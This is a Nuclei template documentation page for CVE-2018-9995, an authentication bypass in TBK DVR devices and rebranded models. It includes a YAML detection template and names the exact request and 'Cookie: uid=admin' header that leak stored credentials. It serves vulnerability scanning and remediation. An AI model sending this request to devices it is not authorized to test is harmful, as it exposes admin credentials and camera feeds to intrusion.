Skip to content
Nuclei Templates

TBK DVR4104/DVR4216 Devices - Authentication Bypass

ID: CVE-2018-9995

Severity: critical

Author: princechaddha

Tags: cve,cve2018,auth-bypass,tbk,edb,tbkvision

Description

Section titled “Description”

TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, andMDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypassauthentication via a “Cookie: uid=admin” header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.

YAML Source

Section titled “YAML Source”
id: CVE-2018-9995


info:
  name: TBK DVR4104/DVR4216 Devices - Authentication Bypass
  author: princechaddha
  severity: critical
  description: |
    TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and
    MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass
    authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to unauthorized configuration changes or data exfiltration.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability and ensure strong and unique passwords are used for device access.
  reference:
    - https://www.exploit-db.com/exploits/44577/
    - http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html
    - http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html
    - https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-9995
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-9995
    epss-score: 0.90006
    epss-percentile: 0.98565
    cpe: cpe:2.3:o:tbkvision:tbk-dvr4216_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tbkvision
    product: tbk-dvr4216_firmware
  tags: cve,cve2018,auth-bypass,tbk,edb,tbkvision


http:
  - method: GET
    path:
      - "{{BaseURL}}/device.rsp?opt=user&cmd=list"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"uid\":"
          - "\"pwd\":"
          - "\"view\":"
          - "playback"
        condition: and


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a26897df912f61e5a838da4c42c8b1b054f8ce81aed7e266b90e5f180a77c61d022100c35cdfac7db3a7a109adddcb9358a851a6b66679cc9c3bbdbf35b955b9c9a9a4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-9995.yaml"

View on Github